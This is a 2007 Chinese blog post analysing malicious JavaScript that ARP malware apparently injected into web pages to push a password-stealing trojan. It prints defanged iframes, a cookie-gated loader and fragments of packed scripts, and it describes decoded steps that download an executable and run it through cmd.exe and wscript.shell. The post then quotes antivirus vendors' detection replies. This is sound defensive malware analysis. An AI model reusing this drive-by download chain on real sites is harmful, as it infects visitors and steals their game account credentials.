ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码

最新推荐文章于 2021-06-18 20:52:35 发布
最新推荐文章于 2021-06-18 20:52:35 发布
阅读量1.8k 收藏
点赞数
分类专栏: 系统安全 文章标签: function exe iframe 解密 math random
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1720347
版权

ARP病毒自动加入传播Trojan.PSW.Win32.OnlineGames的代码

endurer 原创
2007-07-31 第1

前两天,一位网友反映他最近打开网页显示都是乱码。

让他把网页源代码传过来分析,发现网页首部被加入代码:
/---
<iframe src=hxxp://**.9**-*6*.in/n.js width=1 height=1></iframe>
---/

hxxp://**.9**-*6*.in/n.js 包含代码:
/---
document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script src=\"hxxp:\/\/**.9**-*6*.in\/S368\/NewJs2.js\"><\/script>");
document.writeln("<script>");
document.writeln("function StartRun(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition!= -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"hxxp:\/\/**.9**-*6*.in\/s368\/T368.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("StartRun();");
document.writeln("<\/script>")
---/

hxxp://**.9**-*6*.in/S368/NewJs2.js 内容为:
/---
StrInfo =  "\x3c\x73\x63…(略)…\x74\x3e"
window["\x64\…(略)…\x74"]["\x77…(略)…\x65"](StrInfo);
---/

经过2次解密得到原始代码,功能是下载S368.exe,保存到 %windir%,文件由自定义函数
/---
function GnMs(n)

var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';

---/
生成,即~Temp****.tmp,然后调用 cmd.exe /c 来运行。


hxxp://**.9**-*6*.in/s368/T368.htm 内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…123|eval'.split('|'),0,{}))
---/


经过2次解密得到原始代码:
/---
info =  "<script src=\"S368.jpg\"></script>"
document.write(info)
<script src="S368.jpg"></script>
---/

hxxp://**.9**-*6*.in/s368/S368.jpg 的内容为:
/---
eval(function(p,a,c,k,e,r){e=function(c){return(…(略)…|x55'.split('|'),0,{}))
---/

经过2次解密得到原始代码,功能是利用 WebThunder,通过IE打开网页 hxxp://c***k*1**.in/S368/downmm.html,通过 wscript.shell有exec 执行 IE缓存中的 S3682[1].exe。

hxxp://c***k*1**.in/S368/downmm.html 的内容为:
/---
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};…(略)…|eval'.split('|'),0,{}))
</script>
---/

经过2次解密得到原始代码:
/---
eval("document.writeln("<script src=\"S3682.exe\"><\/script>")")<script src="S3682.exe"></script>
<script src="S3682.exe"></script>
---/


文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-30 12:24:59
修改时间 : 2007-7-30 12:25:2
访问时间 : 2007-7-30 0:0:0
大小 : 23599 字节 23.47 KB
MD5 : cbcc07d2350560c4be2cf073382aa3f2
EXEStealth 2.0 - 2.4 -> WebtoolMaster 

主 题:RE: S368.exe [KLAB-2526687]
  发件人:"" <newvirus@kaspersky.com>  发送时间:2007-07-30 13:50:17

Hello.
Virus.Win32.AutoRun.bk
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.

-----------------
Regards, Yury Nesmachny
Virus Analyst, Kaspersky Lab.

主 题:病毒上报邮件分析结果-流水单号:20070730123450377314
  发件人:"" <send@rising.net.cn>    <script language="JavaScript" type="text/javascript"> </script> 发送时间:2007-07-31 21:56:41
尊敬的客户,您好!
    您的邮件已经收到,感谢您对瑞星的支持。

    我们已经详细分析过您的问题和文件,以下是您上传的文件的分析结果:
    1.文件名:S368.exe
    病毒名: Trojan.PSW.Win32.OnlineGames.dsp

    您所上报的病毒文件将在19.34.02版本中处理解决。

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
某健康学校网站被植入传播Trojan-Downloader.Win32.Delf.bho的代码
Purpleendurer@CSDN
04-29 1434
endurer 原创2007-04-29  第1版植入的代码为:/---<iframe src=hxxp://www.1**8d*m***m.com/d***m*/kehu0739.htm width=0 height=0>---/kehu0739.htm的内容所用代码为US-ASCII。到 http://purpleendurer.ys168.com 下载 US-ASCII加密、解密
小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv等
Purpleendurer@CSDN
05-14 3402
endurer 原创2007-05-14 第1版该网站的网页是保存了腾讯官方网站的内容后进行修改的,相当具有迷惑性。在网页中发现代码:<iframe src="hxxp://www.p***um**a163**.com/p***u/1248481.htm" width="0" height="0" frameborder="0"></iframe><iframe src="hxxp:/
一个会下载至少3个Viking等恶意程序的网站
Purpleendurer@CSDN
06-07 1836
endurer 原创2007-06-07 第1版有网友说他的电脑打开某个网站后不久,杀毒软件的实时监控被关闭,系统时间被修改,接着安装各种网络游戏和聊天账号的盗号木马。检查该网站首页代码,发现:/---if(parent.window.opener) parent.window.opener.location=hxxp://aa***a.sqr***s11**0.com/;……(略)…
JavaScript之对象(二)
Wind_waving的博客
02-22 125
js内部具体对象及其成员: String对象:需要创建实例来调用其属性和方法。也可以在用引号括起来的字符串后直接加上" . "来调用String的属性方法。 属性:length; 方法:anchor,big,在字符串两边加上相应的HTML标签对;bold,fontcolor,将字符串转换为HTML代码;charAt返回指定字符的位置;indexOf返回某字符串在对象中第一次出现的位...
js基础一
wyl_1483061559的博客
04-15 137
&lt;html&gt; &lt;head&gt; &lt;meta http-equiv="refresh" content="2"&gt; &lt;script type="text/javascript"&gt; var var01=1; function funtst(){ document.write(var01);//undefined v
Trojan-Downloader.Win32.Generic.a...
06-08
病毒名称】:Trojan-Downloader.Win32.Generic.a 【病毒类型】:下载者 【危害程度】:中 【传播方式】:网络 【受影响系统】:windows 98以上 病毒行为: 该病毒为下载者木马类,病毒运行后调用API获取系统文件夹...
2020年trojan最新windows64客户端trojan-1.15.1-win.zip
04-14
2020年trojan最新windows64客户端
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
描述中提到的“Cross-Platform worm-trojan (Win32 , Linux and Mac OS ) source in REALBasic”进一步确认了这是一个跨平台的蠕虫木马源代码,是用REALBasic编程语言编写的。REALBasic是一种基于Basic的集成开发...
安全相关-病毒防治-trojan remover(木马查杀) v6.zip
08-12
《全面了解Trojan Remover:木马查杀利器》 在当今的数字世界中,网络安全是每个用户都必须关注的重要话题。尤其是对于个人电脑和企业网络而言,病毒、木马等恶意软件的威胁无处不在。本文将详细介绍一款专注于木马...
trojan-1.16.0-win.zip
04-01
trojan
ARP病毒加的网址利用雅虎通Webcam Viewer ActiveX控件远程栈溢出漏洞传播Worm.Delf.yqz
Purpleendurer@CSDN
06-11 3178
endurer 原创2007-06-11 第1版今天在使用Web邮箱时,Kaspersky报告:/---已检测到: 恶意程序 Exploit.HTML.Ascii.o URL: hxxp://mm***.98*7**99***9.com/mm/a.htm---/Google搜索了一下,发现此代码是一种ARP病毒添加的。检查发现网页都被加入代码:/---<iframe SRC="hxx
遭遇Trojan.PSW.OnlineGames、Trojan.HiJack.a、Trojan.PSW.ZhuXian.b等
Purpleendurer@CSDN
06-08 7778
endurer 原创2007-06-08  第1版一位网友说他的电脑最近反应速度很慢,让偶通过QQ远程协助帮忙检修。先用msconfig检查,发现了一些可疑启劝项,把金山毒霸升级到最新后扫描系统,没有发现病毒。到 http://endurer.ys168.com 下载 HijackThis 和 瑞星杀毒助手 Aide4Rav。到 http://purpleendurer.ys168.c
Trojan.PSW.Win32.GameOL,Trojan.Win32.Undef,Trojan.DL.Win32.Undef等2
Purpleendurer@CSDN
09-12 2805
Trojan.PSW.Win32.GameOL,Trojan.Win32.Undef,Trojan.DL.Win32.Undef等2 endurer 原创2008-09-12 第1版 (续1)从pe_xscan的 log 生成日期可以发现电脑系统日期被修改到2000年了 先到 http://purpleendurer.ys168.com 下载 bat_do 和 Fi
2021-06-18
lilongw00的博客
06-18 91
题目: 1.搜索整个文件夹,包括文件夹内的所有文件夹 2.筛选体积大于100MB的压缩包zip文件 3.筛选这些文件中日期早于XXX年之前的文件 4.输出这些文件的路径 import os#调用'os'模块 import datetime#调用'datetime' for dirpath,dirname,filenames in os.walk('D:\\'):#1.搜索整个文件夹,包括文件夹内的所有文件夹 # dirpath是文件夹路径 # dirnames是dirpath这个文件夹下的 子文件夹 列表
小心题为:好久不见啦! 的邮件传播Trojan-PSW.Win32.Magania
Purpleendurer@CSDN
05-23 1285
小心题为:好久不见啦! 的邮件传播Trojan-PSW.Win32.Maganiaendurer 原创2008-05-23 第1版主 题: 好久不见啦! 正 文: 哈囉妳最近好ㄇ??好想妳唷~我最好ㄌ好朋友唷~!!>0附 件: 禬苂~~~苂苂!.zip文件说明符 : D:/test/禬苂~~~苂苂!.zip属性 : A---获取文件版本信息大小失败!创建时间 : 2008-5-19
网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播
Purpleendurer@CSDN
09-21 2176
网友遇到 Trojan.DL.Win32.Agent.yqv,疑是ARP病毒传播endurer 原创2007-09-21 第1版一位网友发来 email 说他现在使用电脑浏览网页时,隔一段时间瑞星就会提示发现病毒:/---病毒名称                        处理结果    发现日期    路径   文件Trojan.DL.Script.VBS.Agent.xgp  跳过
ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaa
Purpleendurer@CSDN
08-28 1943
ARP病毒加入的网址传播 Trojan.PSW.Win32.OnlineGames,Trojan.DL.Win32.Agent.xaaendurer 原创2007-08-28 第1版昨天单位又有电脑中了ARP病毒,打开任一网页时,Kaspersky 总报告已检测到: 木马程序 Trojan-Downloader.JS.Psyme.kf。中午因为帮网友检修电脑(见: 遭遇一堆 Tro
无耻的Trojan-psw.win32.onlinegames
longzhizu的专栏
05-18 485
最近不知道怎么的了就中了Trojan-psw.win32.onlinegames.*的病毒,弄得我第一次重装系统,重装之后好了一段时间,不知道怎么的又中了。而且卡巴老是提示发现木马,但是怎么也删除不了。足足折腾了我好几天,在网上也找了很多资料,都是要删除什么文件,而且还要修改注册表。但是我的病毒的特征跟网上说的那些有些地方又有所不同,所以有些东西也没删除。所以很烦恼,为什么卡巴发现但是又彻底删除不
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等
Purpleendurer@CSDN
02-27 2061
ARP病毒加的网址传播Trojan.PSW.Win32.OnlineGames.GEN等endurer 原创2008-02-26 第1版该病毒会向所网页加入代码:/---<iframe src=hxxp://a**d*.1**02**4.mo*.cn/SHUI**/4.HTM width=0 height=0></iframe>---/1 hxxp://a**d*.1**02**4.m
Trojan-Downloader.Win32.Agent.bbb 木马手动查杀
最新发布
06-09
首先,关闭所有正在运行的程序,然后按照以下步骤手动查杀Trojan-Downloader.Win32.Agent.bbb木马: 1. 打开任务管理器,结束所有Trojan-Downloader.Win32.Agent.bbb木马相关进程。 2. 删除Trojan-Downloader.Win...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值